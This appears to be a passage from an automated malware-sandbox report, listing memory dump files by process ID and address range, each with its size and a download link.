memory/2276-221-0x00000000075E0000-0x00000000075F0000-memory.dmp

Filesize
64KB

Download
memory/2276-242-0x0000000009C10000-0x0000000009C2E000-memory.dmp

Filesize
120KB

Download
memory/2276-445-0x0000000007700000-0x000000000771A000-memory.dmp

Filesize
104KB

Download
memory/2276-450-0x00000000076F0000-0x00000000076F8000-memory.dmp

Filesize
32KB

Download
memory/2276-222-0x00000000075E0000-0x00000000075F0000-memory.dmp

Filesize
64KB

Download
memory/2276-469-0x0000000072A10000-0x00000000730FE000-memory.dmp

Filesize
6.9MB

Download
memory/2276-241-0x000000006F7B0000-0x000000006F7FB000-memory.dmp

Filesize
300KB

Download
memory/2276-248-0x00000000075E0000-0x00000000075F0000-memory.dmp

Filesize
64KB

Download
memory/2276-239-0x000000007EEF0000-0x000000007EF00000-memory.dmp

Filesize
64KB

Download
memory/3200-895-0x00007FFB99E20000-0x00007FFB9A80C000-memory.dmp

Filesize
9.9MB

Download
memory/3200-899-0x000001ED5E6E0000-0x000001ED5E6F0000-memory.dmp

Filesize
64KB

Download
memory/3200-900-0x000001ED5E6E0000-0x000001ED5E6F0000-memory.dmp

Filesize
64KB

Download
memory/3200-922-0x00007FF7CE600000-0x00007FF7CE610000-memory.dmp

Filesize
64KB

Download
memory/3260-477-0x0000000006CD0000-0x0000000006CE0000-memory.dmp

Filesize
64KB

Download
memory/3260-188-0x0000000007A60000-0x0000000007A7C000-memory.dmp

Filesize
112KB

Download
memory/3260-478-0x0000000006CD0000-0x0000000006CE0000-memory.dmp

Filesize
64KB

Download
memory/3260-187-0x0000000007B00000-0x0000000007E50000-memory.dmp

Filesize
3.3MB

Download
memory/3260-374-0x0000000072A10000-0x00000000730FE000-memory.dmp

Filesize
6.9MB

Download
memory/3260-185-0x00000000072A0000-0x0000000007306000-memory.dmp

Filesize
408KB

Download
memory/3260-184-0x0000000007120000-0x0000000007142000-memory.dmp

Filesize
136KB

Download
memory/3260-179-0x0000000072A10000-0x00000000730FE000-memory.dmp

Filesize
6.9MB

Download
memory/3260-180-0x0000000006CD0000-0x0000000006CE0000-memory.dmp

Filesize
64KB

Download
memory/3260-209-0x00000000098A0000-0x0000000009D9E000-memory.dmp

Filesize
5.0MB

Download
memory/3260-208-0x0000000009260000-0x0000000009282000-memory.dmp

Filesize
136KB

Download
memory/3260-207-0x0000000009000000-0x000000000901A000-memory.dmp

Filesize
104KB

Download
memory/3260-206-0x0000000009300000-0x0000000009394000-memory.dmp

Filesize
592KB

Download
memory/3260-190-0x00000000081E0000-0x0000000008256000-memory.dmp

Filesize
472KB

Download
memory/3260-189-0x0000000008400000-0x000000000844B000-memory.dmp

Filesize
300KB

Download
memory/3260-181-0x0000000001260000-0x0000000001296000-memory.dmp

Filesize
216KB

Download
memory/3260-186-0x00000000071C0000-0x0000000007226000-memory.dmp

Filesize
408KB

Download
memory/3260-182-0x0000000006CD0000-0x0000000006CE0000-memory.dmp

Filesize
64KB

Download
memory/3260-183-0x0000000007310000-0x0000000007938000-memory.dmp

Filesize
6.2MB

Download
memory/3772-461-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3788-67-0x0000017CE2F90000-0x0000017CE2F92000-memory.dmp

Filesize
8KB

Download
memory/3788-65-0x0000017CE2F70000-0x0000017CE2F72000-memory.dmp

Filesize
8KB

Download
memory/3788-61-0x0000017CE2F40000-0x0000017CE2F42000-memory.dmp

Filesize
8KB

Download
memory/4140-663-0x00007FF659BE0000-0x00007FF65A575000-memory.dmp

Filesize
9.6MB

Download
memory/4140-506-0x00007FF659BE0000-0x00007FF65A575000-memory.dmp

Filesize
9.6MB

Download
memory/4276-514-0x00000213E5080000-0x00000213E5090000-memory.dmp

Filesize
64KB

Download
memory/4276-567-0x00007FF7CE810000-0x00007FF7CE820000-memory.dmp

Filesize
64KB

Download
memory/4276-625-0x00000213E5080000-0x00000213E5090000-memory.dmp

Filesize
64KB

Download
memory/4276-649-0x00000213E5080000-0x00000213E5090000-memory.dmp

Filesize
64KB

Download
memory/4276-659-0x00007FFB99E20000-0x00007FFB9A80C000-memory.dmp

Filesize
9.9MB

Download
memory/4276-520-0x00000213E5210000-0x00000213E5286000-memory.dmp

Filesize
472KB

Download
memory/4276-516-0x00000213E5050000-0x00000213E5072000-memory.dmp

Filesize
136KB

Download
memory/4276-515-0x00000213E5080000-0x00000213E5090000-memory.dmp

Filesize
64KB

Download
memory/4276-566-0x00000213E51C0000-0x00000213E51CA000-memory.dmp

Filesize
40KB

Download
memory/4276-513-0x00007FFB99E20000-0x00007FFB9A80C000-memory.dmp

Filesize
9.9MB

Download
memory/4380-666-0x00007FF72A7A0000-0x00007FF72B135000-memory.dmp

Filesize
9.6MB

Download
memory/4380-846-0x00007FF72A7A0000-0x00007FF72B135000-memory.dmp

Filesize
9.6MB

Download
memory/4672-16-0x000002390CD00000-0x000002390CD10000-memory.dmp

Filesize
64KB

Download
memory/4672-35-0x000002390CEE0000-0x000002390CEE2000-memory.dmp

Filesize
8KB

Download
memory/4672-0-0x000002390C920000-0x000002390C930000-memory.dmp

Filesize
64KB

Download
memory/4672-109-0x0000023913B00000-0x0000023913C38000-memory.dmp

Filesize
1.2MB

Download
memory/4672-128-0x0000023913B00000-0x0000023913C38000-memory.dmp

Filesize
1.2MB

Download
memory/4672-133-0x0000023913D50000-0x0000023913D51000-memory.dmp

Filesize
4KB

Download
memory/4672-132-0x0000023913D40000-0x0000023913D41000-memory.dmp

Filesize
4KB

Download
memory/5052-793-0x0000021DE2630000-0x0000021DE2640000-memory.dmp

Filesize
64KB

Download
memory/5052-672-0x0000021DE2630000-0x0000021DE2640000-memory.dmp

Filesize
64KB

Download
memory/5052-827-0x00007FFB99E20000-0x00007FFB9A80C000-memory.dmp

Filesize
9.9MB

Download
memory/5052-794-0x0000021DE2630000-0x0000021DE2640000-memory.dmp

Filesize
64KB

Download
memory/5052-695-0x0000021DE25D0000-0x0000021DE25EC000-memory.dmp

Filesize
112KB

Download
memory/5052-671-0x00007FFB99E20000-0x00007FFB9A80C000-memory.dmp

Filesize
9.9MB

Download
memory/5052-673-0x0000021DE2630000-0x0000021DE2640000-memory.dmp

Filesize
64KB

Download
memory/5052-696-0x00007FF7CE890000-0x00007FF7CE8A0000-memory.dmp

Filesize
64KB

Download
memory/5052-702-0x0000021DE28C0000-0x0000021DE2979000-memory.dmp

Filesize
740KB

Download
memory/5100-494-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/5100-486-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/5100-489-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/5100-491-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download